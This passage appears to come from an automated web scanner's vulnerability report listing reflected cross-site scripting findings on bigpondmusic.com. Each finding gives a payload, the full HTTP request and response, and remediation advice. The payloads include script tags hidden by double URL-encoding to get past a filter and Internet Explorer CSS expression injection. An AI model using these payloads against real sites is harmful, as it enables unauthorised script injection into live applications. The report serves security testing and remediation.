This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression in an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /album/various-artists/so-fresh-the-hits-of-summer-2011-the-best-of-2010?1bfcd"style%3d"x%3aexpression(alert(1))"22a4ca4833e=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:17:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 153233


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Various Artists - So Fresh T
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/various-artists/so-fresh-the-hits-of-summer-2011-the-best-of-2010?1bfcd"style="x:expression(alert(1))"22a4ca4833e=1" />
...[SNIP]...

2.159. http://bigpondmusic.com/album/various-artists/weekend-songs [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/various-artists/weekend-songs

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 965ed%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed0c19fa9bd1 was submitted in the REST URL parameter 1. This input was echoed as 965ed"><script>alert(1)</script>d0c19fa9bd1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /album965ed%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed0c19fa9bd1/various-artists/weekend-songs HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:18:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88461


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album965ed"><script>alert(1)</script>d0c19fa9bd1/various-artists/weekend-songs" />
...[SNIP]...

2.160. http://bigpondmusic.com/album/various-artists/weekend-songs [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /album/various-artists/weekend-songs

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3a148'%3b45d6ab478f5 was submitted in the REST URL parameter 1. This input was echoed as 3a148';45d6ab478f5 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /album3a148'%3b45d6ab478f5/various-artists/weekend-songs HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:18:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88238


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
trabpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'album3a148';45d6ab478f5';
   s.prop4 = 'various-artists';
   s.prop5 = 'weekend-songs';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.p
...[SNIP]...

2.161. http://bigpondmusic.com/album/various-artists/weekend-songs [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/various-artists/weekend-songs

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c3767"style%3d"x%3aexpression(alert(1))"e545b48a308 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c3767"style="x:expression(alert(1))"e545b48a308 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/various-artists/weekend-songs?c3767"style%3d"x%3aexpression(alert(1))"e545b48a308=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:18:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 169650


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Various Artists - Weekend So
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/various-artists/weekend-songs?c3767"style="x:expression(alert(1))"e545b48a308=1" />
...[SNIP]...

2.162. http://bigpondmusic.com/bargains/dalbums [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /bargains/dalbums

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e1081'%3b46a0f08e718 was submitted in the REST URL parameter 1. This input was echoed as e1081';46a0f08e718 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bargainse1081'%3b46a0f08e718/dalbums HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:17:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87802


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
bpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'bargainse1081';46a0f08e718';
   s.prop4 = 'dalbums';
   
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '|' + s.channel + '|' + s.prop4;
   s.prop11
...[SNIP]...

2.163. http://bigpondmusic.com/bargains/dalbums [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /bargains/dalbums

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e05b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6a53617805a was submitted in the REST URL parameter 1. This input was echoed as 1e05b"><script>alert(1)</script>6a53617805a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /bargains1e05b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6a53617805a/dalbums HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:17:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87866


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/bargains1e05b"><script>alert(1)</script>6a53617805a/dalbums" />
...[SNIP]...

2.164. http://bigpondmusic.com/bargains/dalbums [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /bargains/dalbums

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eadd3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9f418beffdc was submitted in the REST URL parameter 2. This input was echoed as eadd3"><script>alert(1)</script>9f418beffdc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /bargains/dalbumseadd3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9f418beffdc HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:17:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88231


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/bargains/dalbumseadd3"><script>alert(1)</script>9f418beffdc" />
...[SNIP]...

2.165. http://bigpondmusic.com/bargains/dalbums [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /bargains/dalbums

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 907ce'%3beb1515a2326 was submitted in the REST URL parameter 2. This input was echoed as 907ce';eb1515a2326 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bargains/dalbums907ce'%3beb1515a2326 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:17:47 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87793


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
sting.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'bargains';
   s.prop4 = 'dalbums907ce';eb1515a2326';
   
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '|' + s.channel + '|' + s.prop4;
   s.prop11 = 'Non-Registered-Musi
...[SNIP]...

2.166. http://bigpondmusic.com/bargains/dalbums [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /bargains/dalbums

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 643e0"style%3d"x%3aexpression(alert(1))"352441b3890 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 643e0"style="x:expression(alert(1))"352441b3890 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /bargains/dalbums?643e0"style%3d"x%3aexpression(alert(1))"352441b3890=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:16:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 349065


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Double Albums - BigPond Musi
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/bargains/dalbums?643e0"style="x:expression(alert(1))"352441b3890=1" />
...[SNIP]...

2.167. http://bigpondmusic.com/bargains/under11 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /bargains/under11

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 553f9'%3b12846113a16 was submitted in the REST URL parameter 1. This input was echoed as 553f9';12846113a16 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bargains553f9'%3b12846113a16/under11 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:16:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87871


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
bpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'bargains553f9';12846113a16';
   s.prop4 = 'under11';
   
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '|' + s.channel + '|' + s.prop4;
   s.prop11
...[SNIP]...

2.168. http://bigpondmusic.com/bargains/under11 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /bargains/under11

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be40b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea55f571f2e8 was submitted in the REST URL parameter 1. This input was echoed as be40b"><script>alert(1)</script>a55f571f2e8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /bargainsbe40b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea55f571f2e8/under11 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:16:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87904


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/bargainsbe40b"><script>alert(1)</script>a55f571f2e8/under11" />
...[SNIP]...

2.169. http://bigpondmusic.com/bargains/under11 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /bargains/under11

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a0f0%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6d2018e8d34 was submitted in the REST URL parameter 2. This input was echoed as 2a0f0"><script>alert(1)</script>6d2018e8d34 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /bargains/under112a0f0%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6d2018e8d34 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:16:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87866


